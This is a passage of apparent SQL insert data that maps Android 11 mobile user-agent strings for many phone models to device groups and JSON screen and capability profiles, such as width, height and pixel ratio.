Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":832,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; GM1903) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":832,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; GM1910) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":832,\"pixelRatio\":3.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; GM1913) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":833,\"pixelRatio\":3.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; HD1900) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; HD1901) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; HD1903) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; HD1907) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; HD1910) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":833,\"pixelRatio\":3.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; HD1913) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":832,\"pixelRatio\":3.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; IN2010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; IN2013) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; IN2020) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":905,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; IN2023) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":845,\"pixelRatio\":3.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Infinix X693) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; J8210) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; J9210) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; KB2000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; KB2003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; KB2005) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; LE2100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; LE2110) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; LE2123) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":858,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; LM-G850) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; LM-G900) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":937,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; LM-K420) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; LM-K520) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; LM-Q910) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; LM-V600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":937,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M1908C3JGG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2002J9G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2003J15SC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2004J19C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2007J17G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2007J20CG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2007J22G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2007J3SG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2007J3SY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2010J19CG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2010J19SY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2011K2G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2012K11AG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2012K11G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2101K6G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2101K6P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2101K6R) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2101K7AG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2101K7AI) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2101K7BG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2101K7BL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2101K7BNY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2101K9AG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2101K9G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2102J20SG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2103K19G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2103K19PG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; M2103K19PY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; MI 9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; NTH-NX9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Nokia 1.3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":811,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Nokia 2.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Nokia 2.3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Nokia 2.4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Nokia 3.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Nokia 3.4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Nokia 4.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":811,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Nokia 5.3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Nokia 5.4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Nokia 8.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Nokia 8.3 5G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":432,\"screenHeight\":960,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Nokia G10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Nokia G20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Nokia X10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":432,\"screenHeight\":960,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Nokia X20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":432,\"screenHeight\":960,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Note 10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Note 11P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; ONEPLUS A6000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":811,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; ONEPLUS A6003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":811,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; ONEPLUS A6010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":832,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":832,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; POCO F1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":817,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; POCO F2 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; POCO X2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Pixel 2 XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Pixel 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Pixel 3 XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 